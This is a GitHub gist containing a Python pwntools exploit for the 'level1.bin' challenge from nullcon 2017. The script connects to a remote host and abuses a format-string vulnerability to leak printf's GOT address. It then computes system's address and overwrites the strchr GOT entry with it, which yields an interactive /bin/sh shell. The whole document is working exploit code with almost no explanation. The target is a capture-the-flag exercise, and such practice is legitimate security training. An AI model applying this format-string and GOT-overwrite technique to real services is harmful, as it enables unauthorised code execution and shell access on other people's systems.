Skip to content

Instantly share code, notes, and snippets.

@rverton

rverton/level1-pwn.py

Created March 26, 2017 11:46
Show Gist options
  • Save rverton/5164f9ffa7ff5cadbe130ea9ac24d42a to your computer and use it in GitHub Desktop.
Save rverton/5164f9ffa7ff5cadbe130ea9ac24d42a to your computer and use it in GitHub Desktop.
Download ZIP
exploit for level1.bin (nullcon 2017)
Raw
level1-pwn.py
#!/usr/bin/python
# exploit for level1.bin (nullcon 2017)
from pwn import *
def add_book(p):
p.sendline('1')
p.recvuntil('Enter book name: ')
p.sendline('a')
p.recvuntil('Enter book id: ')
p.sendline('1')
def leak_addr(p, addr):
p.sendline('3')
p.recvuntil('Enter query: ')
leak_fmt_str = p32(addr) + "%11$s"
p.sendline(leak_fmt_str)
result = p.recvline().strip()
return u32(result[20:24])
if __name__ == '__main__':
#p = process('./level1.bin', stdin=process.PTY)
p = remote('34.198.96.6', 9001)
p.recvuntil('Enter choice: ')
add_book(p)
p.recvuntil('Enter choice: ')
printf = leak_addr(p, 0x804b014)
printf_offset = 0x0004cdd0
system_offset = 0x0003fe70
system = printf - printf_offset + system_offset
strchr_got = 0x804b030
log.info("printf @ %#x" % printf)
log.info("system @ %#x" % system)
payload = "/bin/sh # "
payload += fmtstr_payload(14, {strchr_got: system}, numbwritten=12)
p.sendline('3')
p.recvuntil('Enter query: ')
p.sendline(payload)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment